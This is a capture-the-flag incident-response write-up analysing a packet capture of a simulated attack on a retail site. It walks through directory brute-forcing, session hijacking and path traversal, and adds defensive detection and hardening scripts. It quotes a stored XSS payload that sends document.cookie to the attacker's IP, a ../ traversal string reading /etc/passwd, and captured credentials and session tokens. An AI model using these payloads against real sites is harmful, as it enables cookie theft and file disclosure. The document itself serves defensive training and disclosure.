Incident Response Report: RetailBreach — Stored XSS, Session Hijacking & Path Traversal on ShopSphere
Platform: CyberDefenders
Challenge: RetailBreach
Category: Network Forensics / Incident Response
Difficulty: Easy
Classification: Confidential
Tools: Wireshark, NetworkMiner, CyberChef
Achievement: Proof of Completion
1. Executive Summary
Incident Type: Web Server Compromise / Stored XSS / Session Hijacking / Path Traversal
Analyst: Lead SOC Analyst / Threat Hunter
ShopSphere, a prominent online retail platform, began experiencing unusual administrative login activity during late-night hours. These logins coincided with an influx of customer complaints about unexplained account anomalies. A network capture (RetailBreach.pcap) was analyzed to determine the nature, source, and full scope of the breach.
The investigation revealed that an external threat actor (111.224.180.128) systematically compromised the platform through a multi-phase attack. The attacker first performed directory brute-forcing with Gobuster, then injected a Stored XSS payload into the reviews form to steal the admin’s session cookie. Using the stolen session token, the attacker impersonated the admin and exploited a Local File Inclusion vulnerability in log_viewer.php to read /etc/passwd via path traversal.
Indicators of Compromise (IOCs)
| Type | Indicator | Description |
|---|---|---|
| Attacker IP | 111.224.180.128 | External threat actor IP. |
| Victim IP | 73.124.17.52 | ShopSphere Web Server. |
| Admin IP | 135.143.142.5 | Legitimate admin user. |
| XSS Payload | <script>fetch(...)document.cookie</script> | Stored XSS injected via reviews form. |
| Stolen Token | lqkctf24s9h9lg67teu8uevn3q | Admin PHPSESSID hijacked via XSS. |
| Vulnerable Script | log_viewer.php | PHP script exploited for Local File Inclusion. |
| Attack Tools | gobuster/3.6 | Directory brute-forcing tool. |
MITRE ATT&CK Mapping Overview
| Tactic | Technique | ID |
|---|---|---|
| Reconnaissance | Active Scanning | T1595 |
| Discovery | File and Directory Discovery | T1083 |
| Initial Access | Exploit Public-Facing Application | T1190 |
| Execution | JavaScript | T1059.007 |
| Credential Access | Steal Web Session Cookie | T1539 |
| Lateral Movement | Use Alternate Authentication Material: Web Session Cookie | T1550.004 |
| Collection | Data from Local System | T1005 |
2. Phase 1: Initial Triage & Attacker Identification
Objective: Establish a high-level picture of the capture and isolate the threat actor’s IP.
Protocol Hierarchy Analysis
Opening Statistics → Protocol Hierarchy revealed key characteristics of the captured traffic:
- 63.5% HTTP — almost entirely a web-based attack
- 16.4% SSH — noted for further investigation
- Only 3 HTML Form URL-encoded submissions — highly targeted POST requests
IPv4 Conversations & Traffic Volume Analysis
Opening Statistics → Conversations → IPv4 revealed two conversations with the server:
| IP Address | Role | Packets |
|---|---|---|
| 73.124.17.52 | ShopSphere Server (victim) | 14,696 |
| 111.224.180.128 | Attacker | 14,517 |
| 135.143.142.5 | Admin / Legitimate User | 179 |
The volume difference immediately flagged the attacker. A legitimate user browsing a shop generates a few hundred packets at most (the admin accounts for 179 here); this IP generated over 14,000, which is consistent with automated tooling rather than human browsing.
Endpoint Analysis
The Endpoints tab confirmed the same three participants and their traffic volumes.
MITRE ATT&CK Reference:
The overwhelming request volume from 111.224.180.128 maps to T1595 — Active Scanning.
3. Phase 2: Reconnaissance — Directory Brute-Forcing
Objective: Identify the attacker’s reconnaissance methodology and initial foothold.
Gobuster Directory Enumeration
Following an HTTP stream from the attacker’s high-volume requests revealed the tool’s identity immediately via the User-Agent header:
```http
GET /.perf HTTP/1.1
Host: shopsphere.com
User-Agent: gobuster/3.6
Accept-Encoding: gzip
```
A real browser would identify itself as Mozilla or Chrome; gobuster/3.6 is the tool’s default User-Agent and an unambiguous signature. Note that Gobuster lets the operator override the User-Agent (its -a/--useragent option), so the string is only reliable when the attacker does not bother to change it. The request rate and the run of 404 responses corroborate the identification independently of the header.
Target Wordlist Analysis
The requests revealed Gobuster was using a wordlist targeting sensitive Linux dotfiles and configuration paths:
```text
/.git/HEAD
/.cache
/.history
/.htaccess
/.bash_history
/.passwd
/.mysql_history
/.htpasswd
/.bashrc
```
These are all files that could expose credentials, shell history, or application configuration.
MITRE ATT&CK Reference:
This reconnaissance maps to T1083 — File and Directory Discovery. The attacker systematically enumerated hidden files and directories to identify attack surfaces.
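The same scanner signals described above can be checked mechanically once the web server’s access log (rather than the pcap) is available. The script below is an added example and not part of the original write-up or the CyberDefenders challenge materials; the log lines are constructed to mirror the Phase 2 traffic, and the thresholds (ten requests, 80% 404 ratio, three dotfile probes) are assumptions to tune per environment. It scores three independent signals so that a scanner which spoofs a browser User-Agent is still caught by its 404 ratio or its dotfile probing.

```python
"""Flag directory brute-forcing in web access logs (added example)."""
import re
from collections import defaultdict

# Apache/nginx "combined" log format, e.g.
# 111.224.180.128 - - [22/Mar/2026:12:01:03 +0000] "GET /.git/HEAD HTTP/1.1" 404 196 "-" "gobuster/3.6"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Default User-Agent fragments of common scanners (assumption: extend from your own intel).
SCANNER_UA = ("gobuster", "dirbuster", "dirb", "feroxbuster", "ffuf", "nikto", "sqlmap")
# Dotfiles and sensitive paths typical of brute-force wordlists (matches the list above).
SENSITIVE_PATHS = ("/.git", "/.htaccess", "/.htpasswd", "/.bash_history", "/.bashrc",
                   "/.mysql_history", "/.passwd", "/.history", "/.cache", "/.env")

def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyse(lines, min_requests=10, not_found_ratio=0.8, min_sensitive=3):
    """Return {ip: [reasons]} for clients whose behaviour looks like automated enumeration."""
    per_ip = defaultdict(lambda: {"total": 0, "404": 0, "sensitive": 0, "uas": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip unparsable lines instead of aborting on one bad entry
        stats = per_ip[rec["ip"]]
        stats["total"] += 1
        stats["uas"].add(rec["ua"])
        if rec["status"] == "404":
            stats["404"] += 1
        if rec["path"].startswith(SENSITIVE_PATHS):
            stats["sensitive"] += 1

    findings = {}
    for ip, s in per_ip.items():
        reasons = []
        tool_uas = sorted(ua for ua in s["uas"] if any(sig in ua.lower() for sig in SCANNER_UA))
        if tool_uas:
            reasons.append(f"scanner User-Agent: {', '.join(tool_uas)}")
        if s["total"] >= min_requests and s["404"] / s["total"] >= not_found_ratio:
            reasons.append(f"{s['404']}/{s['total']} requests returned 404")
        if s["sensitive"] >= min_sensitive:
            reasons.append(f"{s['sensitive']} probes for sensitive dotfiles")
        if reasons:
            findings[ip] = reasons
    return findings

# Constructed sample log: one scanner and one legitimate admin. Real captures are far larger.
SAMPLE_LOG = [
    '135.143.142.5 - - [22/Mar/2026:11:50:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/124.0"',
    '135.143.142.5 - - [22/Mar/2026:11:52:10 +0000] "POST /login.php HTTP/1.1" 302 0 "http://shopsphere.com/login.php" "Mozilla/5.0 (X11; Linux x86_64) Firefox/124.0"',
] + [
    f'111.224.180.128 - - [22/Mar/2026:12:01:{i:02d} +0000] "GET {p} HTTP/1.1" 404 196 "-" "gobuster/3.6"'
    for i, p in enumerate(["/.perf", "/.git/HEAD", "/.cache", "/.history", "/.htaccess", "/.bash_history",
                           "/.passwd", "/.mysql_history", "/.htpasswd", "/.bashrc", "/backup", "/old"])
] + [
    '111.224.180.128 - - [22/Mar/2026:12:01:13 +0000] "GET /admin/ HTTP/1.1" 200 2048 "-" "gobuster/3.6"',
]

if __name__ == "__main__":
    for ip, reasons in analyse(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

On the constructed sample only 111.224.180.128 is reported, with all three reasons; the admin’s two browser requests produce no finding.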
4. Phase 3: Execution — Stored XSS Injection
Objective: Analyze the XSS payload and understand the cookie theft mechanism.
Identifying the Malicious POST Requests
Filtering for POST requests from the attacker revealed two submissions to reviews.php:
```text
http.request.method == "POST" && ip.src == 111.224.180.128
```
XSS Payload Analysis
Following the HTTP stream of the second POST (packet 10058, timestamp ~12:08:47 UTC) exposed the payload in URL-encoded form. Decoding with CyberChef (URL Decode) yielded:
```html
<script>fetch('http://111.224.180.128/'+document.cookie);</script>
```
Payload breakdown:
| Component | Purpose |
|---|---|
| <script>...</script> | Tells the browser to execute the contents as JavaScript |
| fetch('http://...') | Makes an outbound HTTP request from the victim’s browser |
| 'http://111.224.180.128/' | The attacker’s listening server, the destination for stolen data |
| + document.cookie | Appends all cookies readable by script for the current site to the URL |
When executed, the victim’s browser sends a request like:
```http
GET /PHPSESSID=lqkctf24s9h9lg67teu8uevn3q HTTP/1.1
Host: 111.224.180.128
```
document.cookie only returns cookies that were set without the HttpOnly flag, so the fact that the token reached the attacker proves the PHPSESSID cookie was issued without it. Had more than one cookie been set, the whole "name=value; name2=value2" string would have been sent as the path.
Analyst Note:
This is Stored XSS (not Reflected). The payload was submitted via the reviews form and saved to the database. Every user who visited the reviews page would trigger it — including the admin. This persistence is what makes it dangerous.
MITRE ATT&CK Reference:
This attack leverages T1059.007 — JavaScript (injecting malicious script into the reviews form) and T1190 — Exploit Public-Facing Application (exploiting the lack of input sanitization).
5. Phase 4: Credential Access — Session Token Theft
Objective: Determine when the admin’s session was compromised and confirm the stolen token.
Admin Visit Timeline
Filtering for GET requests to any URL containing “reviews” revealed the critical timing:
```text
http.request.method == "GET" && http.request.uri contains "reviews"
```
| Packet | Time | Source | Notes |
|---|---|---|---|
| 61 | 11:xx UTC | 135.143.142.5 | Admin visits reviews — before payload injected. Safe. |
| 10106 | 12:09 UTC | 135.143.142.5 | Admin visits reviews — after payload injected at 12:08. Script fires. |
The 72-second gap between XSS injection (12:08:47 UTC) and the admin’s visit (12:09 UTC) is the window in which the admin’s session was compromised.
Session Token Verification via NetworkMiner
NetworkMiner was loaded with the pcap and the Credentials tab (with “Show Cookies” enabled) surfaced the complete session history:
| Client | Time (UTC) | Credential | Notes |
|---|---|---|---|
| 135.143.142.5 | 11:50 | PHPSESSID=lqkctf24s9h9lg67teu8uevn3q | Admin’s legitimate session established |
| 135.143.142.5 | 11:52 | admin / password123 | ⚠️ Admin credentials in plaintext (HTTP) |
| 111.224.180.128 | 12:00 | PHPSESSID=rprah510186vkkdnfhpe11ea4l | Attacker’s own session during recon |
| 111.224.180.128 | 12:11 | PHPSESSID=lqkctf24s9h9lg67teu8uevn3q | ✅ Attacker using stolen admin token |
The stolen token lqkctf24s9h9lg67teu8uevn3q was confirmed when it appeared in the attacker’s HTTP requests at 12:11 — 2 minutes after the admin visited the poisoned reviews page.
Analyst Note:
NetworkMiner exposed the admin’s credentials (admin / password123) transmitted in plaintext over HTTP. Without HTTPS, any attacker positioned on the network path could have sniffed the username, password and session cookie directly, with no need for XSS. This is a separate, critical vulnerability in its own right, and the weak password compounds it.
Attacker Using Stolen Session
The attacker was observed presenting the stolen PHPSESSID cookie in HTTP requests to the /admin/ scripts, and the HTTP responses flowing back to 111.224.180.128 (admin pages rather than a redirect to the login form) confirmed that the session hijacking was successful.
MITRE ATT&CK Reference:
This phase maps to T1539 — Steal Web Session Cookie (XSS-based cookie theft) and T1550 — Use Alternate Authentication Material (attacker reusing the stolen session from a different IP).
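Two of the observations above, the cookie string appearing as the path of a request to an untrusted host (Phase 3) and one PHPSESSID value presented from two different client IPs (Phase 4), are exactly the conditions a SOC would want to alert on without a manual NetworkMiner review. The script below is an added example, not tooling from the original write-up. It assumes requests have already been extracted from the pcap into records with ts, src, host, path and cookie fields (for instance with tshark -T fields); the record set is constructed to mirror the timeline in this report, and the token values are the ones quoted above.

```python
"""Detect XSS cookie exfiltration and session-token reuse from another client (added example)."""
from collections import defaultdict
from datetime import datetime, timezone
from urllib.parse import unquote

# Cookie names whose appearance as name=value inside a URL is a strong exfiltration signal.
SESSION_COOKIE_NAMES = ("PHPSESSID", "JSESSIONID", "ASP.NET_SessionId", "session", "sid")

def parse_cookie_header(header):
    """'a=1; b=2' -> {'a': '1', 'b': '2'}; tolerates a missing header and odd spacing."""
    jar = {}
    for part in (header or "").split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            jar[k] = v
    return jar

def find_cookie_exfil(requests, trusted_hosts):
    """Requests to an untrusted host whose URL carries a session cookie name=value pair.

    This matches the page's payload, fetch('http://attacker/' + document.cookie),
    which turns the victim's whole cookie string into the request path.
    """
    hits = []
    for r in requests:
        if r["host"] in trusted_hosts:
            continue
        target = unquote(r["path"])  # catch URL-encoded variants of the same leak
        for name in SESSION_COOKIE_NAMES:
            marker = name + "="
            if marker in target:
                token = target.split(marker, 1)[1].split(";")[0].split("&")[0].strip("/ ")
                hits.append({"ts": r["ts"], "victim": r["src"], "sink": r["host"],
                             "cookie": name, "token": token})
    return hits

def find_session_reuse(requests, cookie_name="PHPSESSID"):
    """Session IDs presented by more than one client IP, with the first IP treated as owner.

    Assumption: no NAT or reverse proxy rewrites the client IP; behind one, key on the
    X-Forwarded-For value instead.
    """
    first_seen = defaultdict(dict)  # token -> {ip: first timestamp it presented the token}
    for r in sorted(requests, key=lambda r: r["ts"]):
        tok = parse_cookie_header(r.get("cookie")).get(cookie_name)
        if tok and r["src"] not in first_seen[tok]:
            first_seen[tok][r["src"]] = r["ts"]
    alerts = []
    for tok, ips in first_seen.items():
        if len(ips) > 1:
            owner, *others = sorted(ips, key=ips.get)  # chronological order of first use
            alerts.append({"token": tok, "owner": owner, "hijackers": others,
                           "first_reuse": ips[others[0]]})
    return alerts

def t(hms):
    """Helper for constructed timestamps on the capture date."""
    return datetime.strptime(f"2026-03-22 {hms}", "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)

# Constructed request log mirroring the report's timeline (times within each minute are assumed).
REQUESTS = [
    {"ts": t("11:50:00"), "src": "135.143.142.5",   "host": "shopsphere.com",  "path": "/admin/dashboard.php",
     "cookie": "PHPSESSID=lqkctf24s9h9lg67teu8uevn3q"},
    {"ts": t("12:00:30"), "src": "111.224.180.128", "host": "shopsphere.com",  "path": "/reviews.php",
     "cookie": "PHPSESSID=rprah510186vkkdnfhpe11ea4l"},
    {"ts": t("12:09:59"), "src": "135.143.142.5",   "host": "shopsphere.com",  "path": "/reviews.php",
     "cookie": "PHPSESSID=lqkctf24s9h9lg67teu8uevn3q"},
    # The admin's browser executing the stored payload: the cookie string becomes the path.
    {"ts": t("12:10:00"), "src": "135.143.142.5",   "host": "111.224.180.128",
     "path": "/PHPSESSID=lqkctf24s9h9lg67teu8uevn3q", "cookie": None},
    {"ts": t("12:11:05"), "src": "111.224.180.128", "host": "shopsphere.com",
     "path": "/admin/log_viewer.php?file=error.log", "cookie": "PHPSESSID=lqkctf24s9h9lg67teu8uevn3q"},
]

if __name__ == "__main__":
    for h in find_cookie_exfil(REQUESTS, trusted_hosts={"shopsphere.com"}):
        print("exfil:", h)
    for a in find_session_reuse(REQUESTS):
        print("reuse:", a)
```

On this input the exfil detector reports one leak of lqkctf24s9h9lg67teu8uevn3q from 135.143.142.5 to 111.224.180.128, and the reuse detector names 135.143.142.5 as the token’s owner and 111.224.180.128 as the hijacker, first seen at 12:11:05. Either alert on its own should trigger invalidation of the session server-side.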
6. Phase 5: Discovery & Actions on Objectives — Path Traversal
Objective: Identify the exploited script and the final data exfiltration payload.
HTTP Request Statistics
Using Statistics → HTTP → Requests in Wireshark provided a full inventory of every URL accessed during the capture. Two admin scripts stood out immediately:
```text
/admin/dashboard.php
/admin/log_viewer.php
/admin/log_viewer.php?file=error.log      <- file parameter is a red flag
/admin/review_manager.php
```
The ?file= parameter on log_viewer.php is a textbook arbitrary-file-read sink. A script that takes a filename from user input and opens it from disk without validation lets an attacker read any file the web server process can read. The challenge labels it Local File Inclusion; strictly, reading a file is path traversal, and it only becomes LFI (with a path to code execution) if the script include()s or require()s the file rather than printing it. Both are fixed the same way.
Path Traversal Exploitation
The same HTTP Requests statistics view revealed the final payload:
```text
/admin/log_viewer.php?file=../../../../../etc/passwd
```
How path traversal works:
The web application lives somewhere on the filesystem (e.g., /var/www/html/admin/). Each ../ navigates one directory level up:
```text
/var/www/html/admin/   → ../
/var/www/html/         → ../../
/var/www/              → ../../../
/var/                  → ../../../../
/                      → ../../../../../
```
Four ../ segments are enough to reach the filesystem root from /var/www/html/admin/; the fifth resolves to / again, because ../ has no effect once the path is already at root. That is why attackers routinely overshoot: an extra ../ never hurts, so a payload with a generous count works without knowing the exact depth. Once at /, the payload appends etc/passwd, the Linux file listing every local account.
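The climb-to-root behaviour above, and the allowlist plus realpath()-style containment check recommended in Section 8, can both be demonstrated with a few lines. This is an added example and not code from the write-up or from ShopSphere; it uses posixpath so the normalization is identical on any OS, and the vulnerable resolver stands in for whatever log_viewer.php does internally (the page does not show its source). The base directory /var/www/html/admin and the two-file allowlist are assumptions.

```python
"""Path traversal: how ../ climbs to / and how to stop it (added example)."""
import posixpath

BASE_DIR = "/var/www/html/admin"          # assumed install location of the admin scripts
ALLOWED_LOGS = {"error.log", "access.log"}  # assumed: the only files the viewer should serve

def climb(base, levels):
    """Path reached after `levels` repetitions of ../ from base (mirrors the table above)."""
    return posixpath.normpath(posixpath.join(base, "../" * levels))

def resolve_vulnerable(user_file, base=BASE_DIR):
    """What a naive `$base . '/' . $_GET['file']` ends up opening: no validation at all."""
    return posixpath.normpath(posixpath.join(base, user_file))

def resolve_hardened(user_file, base=BASE_DIR, allowed=ALLOWED_LOGS):
    """Containment check on the normalized path, then an allowlist; raises on rejection.

    normpath stands in for PHP's realpath() here (realpath additionally resolves symlinks,
    which matters when the log directory can contain attacker-created links). commonpath is
    used instead of startswith so that /var/www/html/admin_old is not accepted as inside base.
    """
    full = posixpath.normpath(posixpath.join(base, user_file))
    if posixpath.commonpath([full, base]) != base:
        raise ValueError("path escapes the log directory")
    if posixpath.basename(full) not in allowed or posixpath.dirname(full) != base:
        raise ValueError("file not in allowlist")
    return full

if __name__ == "__main__":
    for n in range(1, 7):
        print(f"{'../' * n:<20} -> {climb(BASE_DIR, n)}")
    print("vulnerable:", resolve_vulnerable("../../../../../etc/passwd"))
    for candidate in ("error.log", "../../../../../etc/passwd", "/etc/passwd", "config.php"):
        try:
            print(candidate, "->", resolve_hardened(candidate))
        except ValueError as e:
            print(candidate, "-> rejected:", e)
```

Running it shows ../ x4 and ../ x5 (and x6) all resolving to /, the vulnerable resolver opening /etc/passwd, and the hardened resolver rejecting the traversal payload, an absolute path, and a file that is inside the directory but not on the allowlist, while still serving error.log.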
MITRE ATT&CK Reference:
This phase maps to T1083 — File and Directory Discovery (probing the log viewer with file=error.log) and T1005 — Data from Local System (reading /etc/passwd via path traversal).
7. Full Attack Timeline
Based on packet timestamps and tool transitions, the complete attack was reconstructed:
| Time (UTC) | Kill Chain Phase | Activity |
|---|---|---|
| 11:50 | — | Admin logs into ShopSphere, session token issued |
| 11:52 | — | Admin credentials transmitted in plaintext (HTTP) |
| 12:00 | Reconnaissance | Attacker begins session, Gobuster scan starts |
| 12:01 | Discovery | Gobuster brute-forces directories, finds admin scripts |
| 12:08 | Execution | Attacker injects XSS payload into reviews form |
| 12:09 | Credential Access | Admin visits reviews page — XSS fires, cookie stolen |
| 12:11 | Lateral Movement | Attacker uses stolen session token, impersonates admin |
| 12:11 | Discovery | Attacker accesses log_viewer.php?file=error.log (test) |
| 12:11 | Actions on Objectives | Attacker reads /etc/passwd via path traversal |
8. Remediation & Mitigation Recommendations
Based on the findings, the following remediation steps should be prioritized:
Immediate Actions
- Take the web server offline and preserve forensic evidence
- Invalidate all active sessions and force password resets
- Audit all customer accounts for unauthorized access
- Block the attacker’s IP (111.224.180.128) at the network perimeter
Short-Term Fixes
- Implement HTTPS across all endpoints — Admin credentials and session tokens were transmitted in plaintext. TLS would have stopped passive sniffing of the login and the cookie on the network path; it would not have stopped the XSS, which runs inside the browser after the page is decrypted.
- Prevent Stored XSS — The reviews form accepted raw HTML/JavaScript and echoed it back to every visitor. Fix it with context-aware output encoding (HTML-escape review text when rendering it); stripping <script> tags server-side is a denylist that attackers bypass with event handlers and other vectors, so it must not be the only control. Set the session cookie with the HttpOnly flag so document.cookie cannot read it, and add Secure and SameSite once HTTPS is in place.
- Fix the file read in log_viewer.php — Never pass user-supplied filenames directly to file read functions. Resolve the path with realpath() and reject anything that does not stay inside the intended log directory, and additionally check the filename against an allowlist of the logs the viewer is meant to show.
Long-Term Hardening
- Implement Content Security Policy (CSP) — A strict CSP (script-src without 'unsafe-inline', connect-src limited to the application’s own origin) would have blocked the injected inline <script> from running and the fetch() call to an external host, even with the payload stored in the database.
- Implement session token binding — Tie the session to client attributes (IP address, User-Agent, or a TLS channel binding) and require re-authentication when they change. The attacker reused the token from a different IP, which such a check would have flagged. Caveat: hard IP binding breaks legitimate users behind NAT or on mobile networks, so treat a mismatch as a step-up authentication trigger rather than an unconditional invalidation.
- Deploy a Web Application Firewall (WAF) — A WAF could have flagged the Gobuster scan pattern (request rate, scanner User-Agent, 404 ratio) and the path traversal payload (../ sequences, including URL-encoded variants) in real time. Treat it as a compensating control, not a substitute for fixing the code.
9. Conclusion
The RetailBreach analysis demonstrates a complete, methodical web application compromise spanning multiple kill chain phases. Key findings include:
- Reconnaissance: The attacker performed automated directory enumeration using gobuster/3.6, identifying admin scripts and application structure.
- Execution: A Stored XSS payload was injected into the reviews form, designed to steal session cookies from any visitor, including the admin.
- Credential Access: The admin’s session token (lqkctf24s9h9lg67teu8uevn3q) was stolen when they visited the poisoned reviews page 72 seconds after the payload was injected.
- Lateral Movement: The attacker impersonated the admin by reusing the stolen session token from a different IP address.
- Data Exfiltration: The file read in log_viewer.php was exploited via path traversal to read /etc/passwd.
Key Takeaways for the SOC:
- Input Validation: Implement strict input validation and context-aware output encoding; Stored XSS remains one of the most impactful client-side vulnerabilities.
- Session Security: Mark session cookies HttpOnly and Secure, bind sessions to client attributes with step-up authentication on mismatch, implement short timeouts, and deploy HTTPS to prevent token theft in transit.
- File Inclusion Prevention: Never pass user-supplied filenames to file read functions. Use allowlists and realpath() containment checks.
- Defense in Depth: Each phase of this attack exploited a separate weakness. Any single fix would have broken the kill chain.
Analysis Date: March 22, 2026
Analyst: El OMARI Zakaria